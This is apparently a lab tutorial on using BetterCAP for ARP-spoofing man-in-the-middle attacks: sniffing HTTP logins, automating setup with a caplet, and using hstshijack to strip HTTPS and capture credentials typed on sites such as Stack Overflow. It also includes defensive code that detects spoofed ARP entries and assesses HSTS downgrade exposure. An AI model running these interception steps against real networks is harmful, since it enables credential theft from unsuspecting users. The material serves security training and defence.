Intercepting HTTP Traffic

BetterCAP is a powerful, easily extensible and portable framework written in Go which aims to offer to security researchers, red teamers and reverse engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking WiFi networks, Bluetooth Low Energy devices, wireless HID devices and Ethernet networks.

Bettercap Official Documentation: https://www.bettercap.org/intro/

Official Repo: https://github.com/bettercap/bettercap

Objectives

  • Intercept Traffic and sniff out user credentials (HTTP and HTTPS).

Requisites

  • Kali Linux virtual machine (Attacker)
  • Any Windows virtual machine (Target)

Install BetterCAP

Launch your Kali Linux, open a new Terminal window and type the following commands:

apt-get update
apt-get install bettercap

BetterCAP modules

To launch the program, type bettercap and specify your current network interface:

bettercap -iface eth0

Type help to list all modules available:

help


The events.stream module is enabled by default and is responsible for reporting the events (logs, new hosts being found, etc.) generated by other modules during the interactive session. It can also be used to programmatically execute commands when specific events occur.

To perform a MITM attack we will use the following modules:

| module | about |
| --- | --- |
| net.probe | When activated, this module will send different types of probe packets to each IP in the current subnet in order for the net.recon module to detect them. |
| net.recon | This module is responsible for periodically reading the system ARP table in order to detect new hosts on the network. |
| arp.spoof | This module keeps spoofing selected hosts on the network using crafted ARP packets in order to perform a MITM attack. |
| net.sniff | This module is a network packet sniffer and fuzzer supporting both BPF syntax and regular expressions for filtering. It is also able to dissect several major protocols in order to harvest credentials. |

You can type help followed by a module name to get details about that module.

Setting up the modules to perform ARP spoofing

  1. Start the prober module, which sends different types of probe packets to each IP in the current subnet so that the net.recon module can detect them. (Note: net.probe may automatically start the net.recon module.)

    net.probe on
10.0.2.0/24 > 10.0.2.42  » net.probe on
10.0.2.0/24 > 10.0.2.42  » [11:43:32] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
10.0.2.0/24 > 10.0.2.42  » [11:43:32] [endpoint.new] endpoint 10.0.2.3 detected as 07:00:27:11:6c:7d .
10.0.2.0/24 > 10.0.2.42  » [11:43:33] [endpoint.new] endpoint 10.0.2.43 detected as 07:00:27:81:d6:f2 .

In my lab, 10.0.2.43 is my Windows virtual machine; this may differ in your virtual environment.

  2. Start network host discovery:

    net.recon on

  • Note: you can type net.show to list all discovered hosts with their IP and MAC addresses.

  3. Set the arp.spoof module option fullduplex to true. When it is true, both the targets and the gateway are spoofed; otherwise only the targets are. (If the router has ARP spoofing protections in place, full-duplex mode will make the attack fail.)

    set arp.spoof.fullduplex true

  4. Specify the targets to spoof (a comma-separated list of MAC addresses, IP addresses, IP ranges or aliases):

    set arp.spoof.targets 10.0.2.43

  5. Start the ARP spoofer:

    arp.spoof on

10.0.2.0/24 > 10.0.2.42  » [12:03:58] [sys.log] [inf] arp.spoof enabling forwarding
10.0.2.0/24 > 10.0.2.42  » [12:03:58] [sys.log] [war] arp.spoof full duplex spoofing enabled, if the router has ARP spoofing mechanisms, the attack will fail.
10.0.2.0/24 > 10.0.2.42  » [12:03:58] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.

  6. Start the packet sniffer:

    net.sniff on

  7. Type help to list the running modules.

The ARP spoofing

Bettercap is fooling the router and the target machine (Windows), putting the attacker machine (Kali) in the middle of the connection.

On my Windows machine, I will use the arp table command to see what is going on.

The Windows machine 'thinks' the router's MAC address is the same as Kali's, since its ARP table is spoofed.
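From the defender's side, the symptom just described (two IP addresses resolving to one MAC) is straightforward to check for. The following is an added example, not part of the original page or of bettercap: it parses Windows `arp -a` output and flags MAC collisions, with 10.0.2.1 as the assumed gateway; the sample output and all MAC addresses are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed `arp -a` output from the Windows target while arp.spoof is running.
# 10.0.2.1 as gateway and all MAC addresses are assumptions for this example.
SAMPLE_ARP_A = """\
Interface: 10.0.2.43 --- 0x5
  Internet Address      Physical Address      Type
  10.0.2.1              08-00-27-5e-11-aa     dynamic
  10.0.2.3              07-00-27-11-6c-7d     dynamic
  10.0.2.42             08-00-27-5e-11-aa     dynamic
  10.0.2.255            ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# One ARP entry: IPv4 address, MAC in dash (Windows) or colon form, entry type.
ARP_LINE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\s+(\w+)"
)

def parse_arp_table(text):
    """Return (ip, mac, type) tuples with MACs normalised to lower-case colon form."""
    entries = []
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            ip, mac, kind = m.groups()
            entries.append((ip, mac.lower().replace("-", ":"), kind))
    return entries

def mac_collisions(entries):
    """MACs claimed by more than one dynamic IP, mapped to those IPs."""
    by_mac = defaultdict(list)
    for ip, mac, kind in entries:
        # Static broadcast/multicast entries are expected to look odd; ignore them.
        if kind != "dynamic":
            continue
        by_mac[mac].append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}

def gateway_is_spoofed(entries, gateway_ip):
    """True when another host claims the gateway's MAC: the arp.spoof fingerprint."""
    return any(gateway_ip in ips for ips in mac_collisions(entries).values())

if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP_A)
    for mac, ips in mac_collisions(table).items():
        print(f"ALERT: {mac} is claimed by {', '.join(ips)}")
    print("gateway spoofed:", gateway_is_spoofed(table, "10.0.2.1"))
```

Running the same check periodically, or alerting on the gateway's MAC changing at all, is the host-side counterpart of the router-side ARP protections the bettercap warning refers to.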

Generate some generic traffic on the target machine

  1. Log into your Windows virtual machine.
  2. Launch the browser and type the URL: http://testhtml5.vulnweb.com
  3. Log into this vulnerable test website with the sample credentials: user: admin | password: password.

Grabbing and analyzing every request

  • Go back to Bettercap on the Kali machine and analyze all the requests sent from the Windows machine.

In the sniffer output we can see the credentials sent to the website. Anything the target machine sends or receives will be captured by the Kali Linux machine.

Note: this technique works on HTTP websites, not HTTPS. To achieve the same against HTTPS you need to bypass HSTS (HTTP Strict Transport Security), which you can do using Bettercap and the hstshijack caplet.

Automate BetterCAP using Caplets

To make your work more efficient, you can automate the module setup by creating a simple caplet file (file.cap) with one command per line.

  1. Create the caplet:

    touch spoof.cap

  2. Add the commands and save it:

    nano spoof.cap

net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 10.0.2.5
arp.spoof on
set net.sniff.local true
net.sniff on

As you can see, these are the same commands, in the same order, that you used previously.

  3. Start Bettercap using the spoof caplet that you created:

    bettercap -iface eth0 -caplet spoof.cap

Bypassing HTTPS using hstshijack

This module injects HTML & JS files with a payload that spoofs your targeted hostnames and communicates with bettercap, revealing all URLs that were discovered in the injected document.

When bettercap receives a callback with a new URL, it sends a HEAD request to learn whether the host in this URL sends HTTPS redirects, and keeps a log.

This is done so that bettercap can know whether it should MITM an SSL connection with a host, before the victim navigates to it.

BetterCAP comes with hstshijack by default.

Official hstshijack repo: https://github.com/bettercap/caplets/blob/master/hstshijack/README.md

My custom hstshijack with spoof caplet: https://github.com/Samsar4/Caplets

Note: with the default payloads this method doesn't work on a few popular websites like Twitter or Facebook, since modern browsers have a security measure for those websites hardcoded in. But it works on the majority of websites that use HTTPS.
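The hardcoded measure referred to above is the browser's HSTS preload list, and the same header decides whether a returning visitor can be served plain HTTP at all. The following added example (mine, not from the page or the hstshijack caplet) parses a Strict-Transport-Security header and classifies a host's exposure to such a downgrade; the preload list entry and all header values are constructed stand-ins.

```python
# Added example (not from the page or from the hstshijack caplet): classify how an
# HSTS-aware browser treats a plain-HTTP downgrade attempt against a host, given
# the site's response headers. ASSUMED_PRELOAD_LIST stands in for the browser's
# built-in preload list; its entry and all header values below are constructed.
ASSUMED_PRELOAD_LIST = {"example-preloaded.test"}


def parse_hsts(value):
    """Parse a Strict-Transport-Security value (RFC 6797) into a dict.

    Directive names are case-insensitive. Returns None when there is no usable
    max-age, since a policy without one must be ignored by the browser.
    """
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    for raw in value.split(";"):
        directive, _, arg = raw.strip().partition("=")
        name = directive.strip().lower()
        if name == "max-age":
            try:
                policy["max_age"] = int(arg.strip().strip('"'))
            except ValueError:
                return None
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
        elif name == "preload":
            policy["preload"] = True
    return policy if policy["max_age"] is not None else None


def downgrade_protection(host, headers, first_visit=True):
    """Return one of:
    'preloaded'   - host is hardcoded in the browser; http:// is never attempted
    'pinned'      - a valid HSTS policy was cached on an earlier visit
    'first-visit' - HSTS is sent but not yet cached; this visit is downgradeable
    'unprotected' - no (or expired) HSTS; every visit is downgradeable
    """
    if host in ASSUMED_PRELOAD_LIST:
        return "preloaded"
    # Header lookup is case-insensitive, like the wire protocol.
    hsts = next((v for k, v in headers.items()
                 if k.lower() == "strict-transport-security"), None)
    policy = parse_hsts(hsts) if hsts is not None else None
    # Note: the 'preload' directive alone protects nothing; only inclusion
    # in the browser's list does, which is the point of the caveat above.
    if policy is None or policy["max_age"] == 0:
        return "unprotected"
    return "first-visit" if first_visit else "pinned"
```

The 'first-visit' result is the window this class of attack relies on for sites that send HSTS but are not preloaded; submitting a site to the preload list closes it.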

  1. Create a caplet called spoof.cap.

  2. Add these lines (remember to put the target IP address in arp.spoof.targets):

net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets <TARGET IP ADDRESS>
arp.spoof on
set net.sniff.local true
net.sniff on

  3. From the folder where you created the caplet, start BetterCAP using the spoof.cap caplet:

    bettercap -iface eth0 -caplet spoof.cap

  4. In BetterCAP, launch hstshijack:

    hstshijack/hstshijack

  5. Switch back to Windows and open the browser.

  6. In this lab we will test the popular Stack Overflow site: type the URL stackoverflow.com and hit Enter. HTTPS is successfully bypassed and the entire website is loaded.

  7. Try to log in with a fake account to test it.

  8. After you have submitted the fake credentials, switch back to BetterCAP on Kali Linux and look for the POST request sniffed by BetterCAP; you will find the typed credentials there.